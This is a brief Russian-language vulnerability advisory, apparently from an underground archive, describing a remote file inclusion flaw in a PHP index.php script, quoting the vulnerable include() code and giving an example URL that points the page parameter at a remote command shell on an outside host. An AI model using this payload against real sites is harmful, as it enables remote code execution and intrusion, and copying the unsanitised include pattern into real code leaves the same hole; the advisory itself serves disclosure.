Не безопасно объявлена переменная $page в сценарии index.php,
что подвергает выполнить произвольный код на удаленной системе.
Уязвимый код :
if(isset($_GET['load']) && $_GET['load'] == «dtu» or $_GET['load'] == «tag») {
include(«$page.php»);
}
else {
include(«tagviewer.php»);
}
?>
Пример:
http://[target]/index.php?page=http://shell.gov/cmd
Уязвимость нашел n4n0bit
Источник: Underground Archive